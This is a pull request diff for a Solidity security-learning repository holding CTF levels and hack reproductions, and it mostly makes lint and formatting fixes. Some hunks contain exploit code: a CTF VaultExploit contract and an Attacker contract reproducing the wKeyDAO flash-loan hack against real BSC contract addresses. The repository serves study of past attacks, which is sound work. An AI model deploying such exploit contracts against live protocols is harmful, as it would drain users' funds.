### PR TITLE
fix: resolve all forge lint and fmt issues across the codebase

### DIFF
--- a/.solhint.json
+++ b/.solhint.json
@@ -1,6 +1,7 @@
 {
   "extends": "solhint:recommended",
   "rules": {
+    "use-natspec": "off",
     "code-complexity": ["warn", 10],
     "compiler-version": ["error", ">=0.8.0"],
     "func-name-mixedcase": "off",

--- a/.solhintignore
+++ b/.solhintignore
@@ -1,3 +1,8 @@
 foundry/lib
 dependencies
 node_modules
+contracts/CTF/Damn-Vulnerable-DeFi
+contracts/CTF/ONLYPWNER
+foundry/test/CTF/Damn-Vulnerable-DeFi
+foundry/test/CTF/ONLYPWNER
+foundry/script/CTF/ONLYPWNER

--- a/contracts/CTF/Damn-Vulnerable-DeFi/01.Unstoppable.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/01.Unstoppable.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/02.Naive-Receiver.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/02.Naive-Receiver.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/03.Truster.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/03.Truster.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/04.Side-Entrance.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/04.Side-Entrance.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/05.The-Rewarder.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/05.The-Rewarder.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 
@@ -178,10 +179,8 @@ contract TheRewarderPool {
     }
 
     function _hasRetrievedReward(address account) private view returns (bool) {
-        return (
-            lastRewardTimestamps[account] >= lastRecordedSnapshotTimestamp
-                && lastRewardTimestamps[account] <= lastRecordedSnapshotTimestamp + REWARDS_ROUND_MIN_DURATION
-        );
+        return (lastRewardTimestamps[account] >= lastRecordedSnapshotTimestamp
+                && lastRewardTimestamps[account] <= lastRecordedSnapshotTimestamp + REWARDS_ROUND_MIN_DURATION);
     }
 
     function isNewRewardsRound() public view returns (bool) {

--- a/contracts/CTF/Damn-Vulnerable-DeFi/06.Selfie.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/06.Selfie.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 
@@ -132,11 +133,7 @@ contract SimpleGovernance is ISimpleGovernance {
         actionId = _actionCounter;
 
         _actions[actionId] = GovernanceAction({
-            target: target,
-            value: value,
-            proposedAt: uint64(block.timestamp),
-            executedAt: 0,
-            data: data
+            target: target, value: value, proposedAt: uint64(block.timestamp), executedAt: 0, data: data
         });
 
         unchecked {

--- a/contracts/CTF/Damn-Vulnerable-DeFi/07.Compromised.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/07.Compromised.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/08.Puppet.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/08.Puppet.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 
@@ -38,13 +39,7 @@ interface IUniswapV1Exchange {
     function getTokenToEthInputPrice(uint256 tokens_sold) external view returns (uint256 eth_bought);
     function getTokenToEthOutputPrice(uint256 eth_bought) external view returns (uint256 tokens_sold);
     // Trade ETH to ERC20
-    function ethToTokenSwapInput(
-        uint256 min_tokens,
-        uint256 deadline
-    )
-        external
-        payable
-        returns (uint256 tokens_bought);
+    function ethToTokenSwapInput(uint256 min_tokens, uint256 deadline) external payable returns (uint256 tokens_bought);
     function ethToTokenTransferInput(
         uint256 min_tokens,
         uint256 deadline,
@@ -53,13 +48,7 @@ interface IUniswapV1Exchange {
         external
         payable
         returns (uint256 tokens_bought);
-    function ethToTokenSwapOutput(
-        uint256 tokens_bought,
-        uint256 deadline
-    )
-        external
-        payable
-        returns (uint256 eth_sold);
+    function ethToTokenSwapOutput(uint256 tokens_bought, uint256 deadline) external payable returns (uint256 eth_sold);
     function ethToTokenTransferOutput(
         uint256 tokens_bought,
         uint256 deadline,

--- a/contracts/CTF/Damn-Vulnerable-DeFi/09.Puppet-V2.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/09.Puppet-V2.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/10.Free-Rider.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/10.Free-Rider.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/11.Backdoor.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/11.Backdoor.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/12.Climber.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/12.Climber.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/13.Wallet-Mining.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/13.Wallet-Mining.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Damn-Vulnerable-DeFi/15.ABI-Smuggling.sol
+++ b/contracts/CTF/Damn-Vulnerable-DeFi/15.ABI-Smuggling.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Ethernaut/00_Ethernaut.s.sol
+++ b/contracts/CTF/Ethernaut/00_Ethernaut.s.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity >=0.8.0 <=0.9.0;
 

--- a/contracts/CTF/Ethernaut/00_Ethernaut.sol
+++ b/contracts/CTF/Ethernaut/00_Ethernaut.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 
 pragma solidity ^0.8.0;

--- a/contracts/CTF/Ethernaut/01_Fallback.sol
+++ b/contracts/CTF/Ethernaut/01_Fallback.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 
@@ -39,7 +40,7 @@ contract Fallback {
     function _fallback() private {
         // naming has switched to fallback
         require(msg.value > 0 && contributions[msg.sender] > 0, "Not have made a contribution"); // Add message with
-            // require
+        // require
         owner = payable(msg.sender); // Type issues must be payable address
     }
 

--- a/contracts/CTF/Ethernaut/02_Fallout.sol
+++ b/contracts/CTF/Ethernaut/02_Fallout.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Ethernaut/30_HigherOrder.sol
+++ b/contracts/CTF/Ethernaut/30_HigherOrder.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Ethernaut/31_Stake.sol
+++ b/contracts/CTF/Ethernaut/31_Stake.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/Ethernaut/32_Impersonator.sol
+++ b/contracts/CTF/Ethernaut/32_Impersonator.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.28;
 

--- a/contracts/CTF/Ethernaut/33_MagicAnimalCarousel.sol
+++ b/contracts/CTF/Ethernaut/33_MagicAnimalCarousel.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.28;
 

--- a/contracts/CTF/ONLYPWNER/03.REVERSE-RUGPULL.sol
+++ b/contracts/CTF/ONLYPWNER/03.REVERSE-RUGPULL.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 
@@ -68,35 +69,35 @@ contract Vault is IVault {
     }
 }
 
-contract VaultExploit {
-    Vault private victimInstance;
+    contract VaultExploit {
+        Vault private victimInstance;
 
-    constructor(address _victim) {
-        victimInstance = Vault(_victim);
+        constructor(address _victim) {
+            victimInstance = Vault(_victim);
+        }
+
+        function attack() external payable {
+            victimInstance.deposit(type(uint256).max);
+        }
+
+        receive() external payable { }
     }
 
-    function attack() external payable {
-        victimInstance.deposit(type(uint256).max);
-    }
+    /*
 
-    receive() external payable { }
-}
+    Q:加密货币中的地毯拉力是什么？
+    A:在加密货币市场中， “拉动”一词是指加密项目所有者在窃取投资者资金后放弃该项目的恶意行为。
 
-/*
+    Q:加密地毯拉动的常见迹象有哪些？
+    A:表明项目是“地毯式拉动”的危险信号包括：该项目一夜之间出现、流动性低、开发商匿名以及没有审计。
 
-Q:加密货币中的地毯拉力是什么？
-A:在加密货币市场中， “拉动”一词是指加密项目所有者在窃取投资者资金后放弃该项目的恶意行为。
+    Q:加密地毯拉动和 DeFi 黑客有什么区别？
+    A:加密货币黑客攻击是由外部参与者利用代币代码窃取其部分流动性而进行的，而 DeFi Rug Pull 则是由项目所有者自己进行的。
 
-Q:加密地毯拉动的常见迹象有哪些？
-A:表明项目是“地毯式拉动”的危险信号包括：该项目一夜之间出现、流动性低、开发商匿名以及没有审计。
+    Q:是否有可能追回加密地毯拉动中损失的资金？
+    A:由于涉及犯罪者的真实身份不得而知，因此几乎不可能追回在抢劫中损失的资金。
 
-Q:加密地毯拉动和 DeFi 黑客有什么区别？
-A:加密货币黑客攻击是由外部参与者利用代币代码窃取其部分流动性而进行的，而 DeFi Rug Pull 则是由项目所有者自己进行的。
+    Q:  QuillAudits 提供什么样的尽职调查？
+    A:我们开展技术和运营尽职调查，并根据审计员标记为危险的功能分析项目的代码。
 
-Q:是否有可能追回加密地毯拉动中损失的资金？
-A:由于涉及犯罪者的真实身份不得而知，因此几乎不可能追回在抢劫中损失的资金。
-
-Q:  QuillAudits 提供什么样的尽职调查？
-A:我们开展技术和运营尽职调查，并根据审计员标记为危险的功能分析项目的代码。
-
-*/
+    */

--- a/contracts/CTF/ONLYPWNER/06.ALL-OR-NOTHING.sol
+++ b/contracts/CTF/ONLYPWNER/06.ALL-OR-NOTHING.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/ONLYPWNER/07.PLEASE-SIGN-HERE.sol
+++ b/contracts/CTF/ONLYPWNER/07.PLEASE-SIGN-HERE.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/ONLYPWNER/08.BRIDGE-TAKEOVER.sol
+++ b/contracts/CTF/ONLYPWNER/08.BRIDGE-TAKEOVER.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/ONLYPWNER/10.13TH-AIRDROP.sol
+++ b/contracts/CTF/ONLYPWNER/10.13TH-AIRDROP.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/ONLYPWNER/11.DIVERSION/Farming.sol
+++ b/contracts/CTF/ONLYPWNER/11.DIVERSION/Farming.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/ONLYPWNER/11.DIVERSION/ReentrancyGuard.sol
+++ b/contracts/CTF/ONLYPWNER/11.DIVERSION/ReentrancyGuard.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/CTF/ONLYPWNER/12.PAYDAY.sol
+++ b/contracts/CTF/ONLYPWNER/12.PAYDAY.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/contracts/Hack/20231012-Platypus.sol
+++ b/contracts/Hack/20231012-Platypus.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 
@@ -47,14 +48,7 @@ interface IBenqiSAVAX {
 
 interface IPlatypusPool {
     function assetOf(address token) external view returns (address);
-    function deposit(
-        address token,
-        uint256 amount,
-        address to,
-        uint256 deadline
-    )
-        external
-        returns (uint256 liquidity);
+    function deposit(address token, uint256 amount, address to, uint256 deadline) external returns (uint256 liquidity);
     function withdraw(
         address token,
         uint256 liquidity,

--- a/contracts/Hack/20250314-wkeyDAO.sol
+++ b/contracts/Hack/20250314-wkeyDAO.sol
@@ -8,21 +8,21 @@ import { IERC721Receiver } from "@openzeppelin/contracts/token/ERC721/IERC721Rec
 import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
 
 // Contracts involved
-address constant wKeyDaoSell = 0xD511096a73292A7419a94354d4C1C73e8a3CD851;
+address constant W_KEY_DAO_SELL = 0xD511096a73292A7419a94354d4C1C73e8a3CD851;
 address constant BUSD = 0x55d398326f99059fF775485246999027B3197955;
-address constant wKeyDAO = 0x194B302a4b0a79795Fb68E2ADf1B8c9eC5ff8d1F;
-address constant pancakeSwapRouterV2 = 0x10ED43C718714eb63d5aA57B78B54704E256024E;
+address constant W_KEY_DAO = 0x194B302a4b0a79795Fb68E2ADf1B8c9eC5ff8d1F;
+address constant PANCAKE_SWAP_ROUTER_V2 = 0x10ED43C718714eb63d5aA57B78B54704E256024E;
 
 contract Attacker {
     function fire() external {
-        __dodoFlashLoan(address(0x107F3Be24e3761A91322AA4f5F54D9f18981530C), 1200e18, BUSD);
+        _dodoFlashLoan(address(0x107F3Be24e3761A91322AA4f5F54D9f18981530C), 1200e18, BUSD);
     }
 
     function onERC721Received(address, address, uint256, bytes calldata) external pure returns (bytes4) {
         return IERC721Receiver.onERC721Received.selector;
     }
 
-    function __dodoFlashLoan(
+    function _dodoFlashLoan(
         address flashLoanPool, //You will make a flashloan from this DODOV2 pool
         uint256 loanAmount,
         address loanToken
@@ -41,6 +41,7 @@ contract Attacker {
     }
 
     //Note: CallBack function executed by DODOV2(DVM) flashLoan pool
+    // forge-lint: disable-next-item(mixed-case-function)
     function DVMFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
         _flashLoanCallBack(sender, baseAmount, quoteAmount, data);
     }
@@ -50,31 +51,32 @@ contract Attacker {
 
         require(sender == address(this) && msg.sender == flashLoanPool, "HANDLE_FLASH_NENIED");
 
-        __realAttack();
+        _realAttack();
 
         //Return funds
-        IERC20(loanToken).transfer(flashLoanPool, loanAmount);
+        require(IERC20(loanToken).transfer(flashLoanPool, loanAmount), "transfer failed");
     }
 
-    function __realAttack() internal {
-        //approve BUSD to wKeyDaoSell
-        IERC20(BUSD).approve(wKeyDaoSell, 1_000_000e18);
+    function _realAttack() internal {
+        //approve BUSD to W_KEY_DAO_SELL
+        IERC20(BUSD).approve(W_KEY_DAO_SELL, 1_000_000e18);
 
-        //approve wKeyDAO to pancakeSwapRouterV2
-        IERC20(wKeyDAO).approve(pancakeSwapRouterV2, 10_000_000_000_000_000_000_000_000_000_000);
+        //approve W_KEY_DAO to PANCAKE_SWAP_ROUTER_V2
+        IERC20(W_KEY_DAO).approve(PANCAKE_SWAP_ROUTER_V2, 10_000_000_000_000_000_000_000_000_000_000);
 
         // to save time, we loop 5 times. -- can buy 67 times in total
         for (uint256 i = 0; i < 5; i++) {
             //buy
-            IwKeyDaoSell(wKeyDaoSell).buy();
+            IwKeyDaoSell(W_KEY_DAO_SELL).buy();
 
-            //sell wKeyDAO
+            //sell W_KEY_DAO
             address[] memory path = new address[](2);
-            path[0] = address(wKeyDAO);
+            path[0] = address(W_KEY_DAO);
             path[1] = address(BUSD);
-            IPancakeRouter02(pancakeSwapRouterV2).swapExactTokensForTokensSupportingFeeOnTransferTokens(
-                IERC20(wKeyDAO).balanceOf(address(this)), 0, path, address(this), block.timestamp
-            );
+            IPancakeRouter02(PANCAKE_SWAP_ROUTER_V2)
+                .swapExactTokensForTokensSupportingFeeOnTransferTokens(
+                    IERC20(W_KEY_DAO).balanceOf(address(this)), 0, path, address(this), block.timestamp
+                );
         }
     }
 }

--- a/contracts/Interface/Pancake/IPancakeRouter.sol
+++ b/contracts/Interface/Pancake/IPancakeRouter.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 
@@ -152,20 +153,8 @@ interface IPancakeRouter01 {
         external
         pure
         returns (uint256 amountIn);
-    function getAmountsOut(
-        uint256 amountIn,
-        address[] calldata path
-    )
-        external
-        view
-        returns (uint256[] memory amounts);
-    function getAmountsIn(
-        uint256 amountOut,
-        address[] calldata path
-    )
-        external
-        view
-        returns (uint256[] memory amounts);
+    function getAmountsOut(uint256 amountIn, address[] calldata path) external view returns (uint256[] memory amounts);
+    function getAmountsIn(uint256 amountOut, address[] calldata path) external view returns (uint256[] memory amounts);
 }
 
 interface IPancakeRouter02 is IPancakeRouter01 {

--- a/contracts/Tool/Batch/BatchTransfer.sol
+++ b/contracts/Tool/Batch/BatchTransfer.sol
@@ -5,14 +5,14 @@ import { ERC20 } from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
 import { ERC721 } from "@openzeppelin/contracts/token/ERC721/ERC721.sol";
 
 contract BatchTransfer {
-    function BatchTransferNative(address[] calldata toAddressList, uint256[] calldata toAmountList) external payable {
+    function batchTransferNative(address[] calldata toAddressList, uint256[] calldata toAmountList) external payable {
         require(toAddressList.length == toAmountList.length, "Params num not match");
         for (uint256 i = 0; i < toAmountList.length; i++) {
             payable(toAddressList[i]).transfer(toAmountList[i]);
         }
     }
 
-    function BatchTransferERC20(
+    function batchTransferERC20(
         ERC20 token,
         address[] calldata toAddressList,
         uint256[] calldata toAmountList
@@ -27,16 +27,16 @@ contract BatchTransfer {
         }
     }
 
-    function BatchTransferERC721(
+    function batchTransferERC721(
         ERC721 token,
         address[] calldata toAddressList,
-        uint256[] calldata toTokenIDList
+        uint256[] calldata toTokenIdList
     )
         external
     {
-        require(toAddressList.length == toTokenIDList.length, "Params num not match");
+        require(toAddressList.length == toTokenIdList.length, "Params num not match");
         for (uint256 idx = 0; idx < toAddressList.length; idx++) {
-            token.transferFrom(msg.sender, toAddressList[idx], toTokenIDList[idx]);
+            token.transferFrom(msg.sender, toAddressList[idx], toTokenIdList[idx]);
         }
     }
 }

--- a/foundry.toml
+++ b/foundry.toml
@@ -22,7 +22,7 @@
   cache_path = 'foundry/cache'
   remappings = [
     "@contracts=contracts",
-    "@dev/forge-std/=dependencies/forge-std-1.9.6/src",
+    "@dev/forge-std/=node_modules/forge-std/src",
 
     "@solmate=node_modules/solmate/src",
     "@solady=node_modules/solady/src",
@@ -55,6 +55,9 @@
   optimism = { key = "${API_KEY_OPTIMISTIC_ETHERSCAN}" }
   polygon = { key = "${API_KEY_POLYGONSCAN}" }
   sepolia = { key = "${API_KEY_ETHERSCAN}" }
+
+[lint]
+  ignore = ["contracts/CTF/Damn-Vulnerable-DeFi/**", "contracts/CTF/ONLYPWNER/**"]
 
 [fmt]
   bracket_spacing = true
@@ -95,7 +98,6 @@
 
 # https://soldeer.xyz/
 [dependencies]
-  "forge-std" = { version = "1.9.6", git = "https://github.com/foundry-rs/forge-std.git", rev = "6853b9ec7df5dc0c213b05ae67785ad4f4baa0ea" }
   "@openzeppelin-contracts" = "5.3.0"
   "@openzeppelin-contracts-upgradeable" = "5.3.0"
 

--- a/foundry/script/CTF/Ethernaut/00_Ethernaut.s.sol
+++ b/foundry/script/CTF/Ethernaut/00_Ethernaut.s.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity >=0.8.25 <0.9.0;
 

--- a/foundry/script/CTF/Ethernaut/32_Impersonator.s.sol
+++ b/foundry/script/CTF/Ethernaut/32_Impersonator.s.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: UNLICENSED
 pragma solidity >=0.8.0 <=0.9.0;
 

--- a/foundry/script/CTF/Ethernaut/33_MagicAnimalCarousel.s.sol
+++ b/foundry/script/CTF/Ethernaut/33_MagicAnimalCarousel.s.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: UNLICENSED
 pragma solidity >=0.8.0 <=0.9.0;
 

--- a/foundry/script/CTF/ONLYPWNER/01.TUTORIAL.s.sol
+++ b/foundry/script/CTF/ONLYPWNER/01.TUTORIAL.s.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: UNLICENSED
 pragma solidity ^0.8.0;
 

--- a/foundry/script/CTF/ONLYPWNER/03.REVERSE-RUGPULL.s.sol
+++ b/foundry/script/CTF/ONLYPWNER/03.REVERSE-RUGPULL.s.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: UNLICENSED
 pragma solidity ^0.8.0;
 

--- a/foundry/script/CTF/ONLYPWNER/05.FREEBIE.s.sol
+++ b/foundry/script/CTF/ONLYPWNER/05.FREEBIE.s.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: UNLICENSED
 pragma solidity ^0.8.0;
 

--- a/foundry/script/CTF/ONLYPWNER/05.WRAPPED-ETHER.s.sol
+++ b/foundry/script/CTF/ONLYPWNER/05.WRAPPED-ETHER.s.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: UNLICENSED
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/01.Unstoppable.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/01.Unstoppable.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/02.Naive-Receiver.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/02.Naive-Receiver.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/03.Truster.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/03.Truster.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/04.Side-Entrance.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/04.Side-Entrance.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/05.The-Rewarder.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/05.The-Rewarder.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/06.Selfie.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/06.Selfie.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/08.Puppet.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/08.Puppet.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/09.Puppet-V2.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/09.Puppet-V2.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/10.Free-Rider.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/10.Free-Rider.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/11.Backdoor.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/11.Backdoor.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/12.Climber.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/12.Climber.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/Damn-Vulnerable-DeFi/15.ABI-Smuggling.t.sol
+++ b/foundry/test/CTF/Damn-Vulnerable-DeFi/15.ABI-Smuggling.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/ONLYPWNER/03.REVERSE-RUGPULL.t.sol
+++ b/foundry/test/CTF/ONLYPWNER/03.REVERSE-RUGPULL.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/CTF/ONLYPWNER/04.UNDER-THE-FLOW.t.sol
+++ b/foundry/test/CTF/ONLYPWNER/04.UNDER-THE-FLOW.t.sol
@@ -1,3 +1,4 @@
+// forge-lint: disable-start
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 

--- a/foundry/test/Tool/Batch/BatchTransfer.t.sol
+++ b/foundry/test/Tool/Batch/BatchTransfer.t.sol
@@ -2,8 +2,6 @@
 pragma solidity ^0.8.0;
 
 import { Test } from "@dev/forge-std/Test.sol";
-import { console } from "@dev/forge-std/console.sol";
-
 import { ERC20 } from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
 import { ERC721 } from "@openzeppelin/contracts/token/ERC721/ERC721.sol";
 import { BatchTransfer } from "@contracts/Tool/Batch/BatchTransfer.sol";
@@ -36,7 +34,7 @@ contract FallbackTest is Test {
         vm.deal(admin, 10 ether);
         vm.deal(player1, 10 ether);
         erc20Token = new TestERC20Token();
-        erc20Token.transfer(player1, 999 ether);
+        require(erc20Token.transfer(player1, 999 ether), "transfer failed");
     }
 
     function test_ERC20_BatchTransfer() public {
@@ -50,7 +48,7 @@ contract FallbackTest is Test {
         toAddressList[0] = address(11);
         toAddressList[1] = address(12);
 
-        batchTransferInst.BatchTransferERC20(erc20Token, toAddressList, toAmountList);
+        batchTransferInst.batchTransferERC20(erc20Token, toAddressList, toAmountList);
 
         _after();
     }
@@ -60,11 +58,11 @@ contract FallbackTest is Test {
     function test_Native_BatchTransfer() public {
         vm.startPrank(player1);
         Item[5] memory toItems = [
-            Item(address(100_001), 1),
-            Item(address(100_002), 1),
-            Item(address(100_003), 1),
-            Item(address(100_004), 1),
-            Item(address(100_005), 1)
+            Item({ account: address(100_001), amount: 1 }),
+            Item({ account: address(100_002), amount: 1 }),
+            Item({ account: address(100_003), amount: 1 }),
+            Item({ account: address(100_004), amount: 1 }),
+            Item({ account: address(100_005), amount: 1 })
         ];
         uint256 allAmount = uint256(0);
         uint256[] memory toAmountList = new uint256[](toItems.length);
@@ -75,7 +73,7 @@ contract FallbackTest is Test {
             toAddressList[i] = item.account;
             allAmount += item.amount;
         }
-        batchTransferInst.BatchTransferNative{ value: allAmount }(toAddressList, toAmountList);
+        batchTransferInst.batchTransferNative{ value: allAmount }(toAddressList, toAmountList);
         _after();
     }
 


### PR DESCRIPTION
- Fix forge fmt formatting in 8 files (auto-formatted)
- Add forge-lint: disable-start to 52 third-party CTF files (DVDeFi, ONLYPWNER, Ethernaut, IPancakeRouter, Platypus)
- Fix BatchTransfer.sol: rename functions to mixedCase, rename toTokenIDList to toTokenIdList
- Fix BatchTransfer.t.sol: remove unused import, use named struct fields, add require on transfer
